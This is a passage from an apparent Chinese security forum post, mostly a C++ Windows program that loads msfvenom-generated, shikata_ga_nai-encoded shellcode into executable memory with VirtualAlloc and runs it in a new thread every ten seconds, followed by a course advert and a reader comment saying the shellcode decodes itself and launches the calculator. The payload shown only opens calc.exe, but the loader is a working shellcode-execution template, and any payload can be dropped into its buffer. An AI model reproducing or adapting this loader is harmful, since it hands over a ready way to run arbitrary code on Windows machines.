#include <Windows.h> #include <iostream> #include <thread> void ThreadFunc() { /* root@kali:~/Desktop# msfvenom -p windows/exec cmd=calc.exe -a x86 --platform windows -f c -b "\x00" Found 22 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 220 (iteration=0) */ const char buf[] = "\xbd\x77\xd7\xc9\xae\xd9\xc2\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x31\x31\x6a\x13\x83\xea\xfc\x03\x6a\x78\x35\x3c\x52\x6e\x3b" "\xbf\xab\x6e\x5c\x49\x4e\x5f\x5c\x2d\x1a\xcf\x6c\x25\x4e\xe3" "\x07\x6b\x7b\x70\x65\xa4\x8c\x31\xc0\x92\xa3\xc2\x79\xe6\xa2" "\x40\x80\x3b\x05\x79\x4b\x4e\x44\xbe\xb6\xa3\x14\x17\xbc\x16" "\x89\x1c\x88\xaa\x22\x6e\x1c\xab\xd7\x26\x1f\x9a\x49\x3d\x46" "\x3c\x6b\x92\xf2\x75\x73\xf7\x3f\xcf\x08\xc3\xb4\xce\xd8\x1a" "\x34\x7c\x25\x93\xc7\x7c\x61\x13\x38\x0b\x9b\x60\xc5\x0c\x58" "\x1b\x11\x98\x7b\xbb\xd2\x3a\xa0\x3a\x36\xdc\x23\x30\xf3\xaa" "\x6c\x54\x02\x7e\x07\x60\x8f\x81\xc8\xe1\xcb\xa5\xcc\xaa\x88" "\xc4\x55\x16\x7e\xf8\x86\xf9\xdf\x5c\xcc\x17\x0b\xed\x8f\x7d" "\xca\x63\xaa\x33\xcc\x7b\xb5\x63\xa5\x4a\x3e\xec\xb2\x52\x95" "\x49\x4c\x19\xb4\xfb\xc5\xc4\x2c\xbe\x8b\xf6\x9a\xfc\xb5\x74" "\x2f\x7c\x42\x64\x5a\x79\x0e\x22\xb6\xf3\x1f\xc7\xb8\xa0\x20" "\xc2\xda\x27\xb3\x8e\x32\xc2\x33\x34\x4b"; LPVOID lpvAddr; HANDLE hHand; DWORD dWaitRet, dThreadId; BOOL bSuccess; lpvAddr = VirtualAlloc(NULL, strlen(buf) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (lpvAddr == NULL) { std::cout << "VirtualAlloc Failed." << std::endl; return; } RtlMoveMemory(lpvAddr, buf, strlen(buf)); hHand = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpvAddr, NULL, 0, &dThreadId); if (hHand == NULL) { std::cout << "CreateThread Failed." << std::endl; return; } std::cout << "wait for thread... \n" << std::endl; dWaitRet = WaitForSingleObject(hHand, INFINITE); if (dWaitRet == WAIT_FAILED) { std::cout << "WaitForSingleObject Failed." << std::endl; } else if (dWaitRet == WAIT_ABANDONED) { std::cout << "Ownership issue with mutex." << std::endl; } bSuccess = VirtualFree(lpvAddr, 0, MEM_RELEASE); if (bSuccess) { std::cout << "Release Succeeded." << std::endl; } else if (!bSuccess) { std::cout << "Release Failed." << std::endl; } return; } int main() { while (1) { std::cout << "starting new thread... \n" << std::endl; ThreadFunc(); Sleep(10000); } }
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
youxiaxy 我也没仔细分析,有错的地方还望见谅。。这段shellcode 解密自己。然后调用 api WinExec 启动 计算器。最后 执行了 Ex ...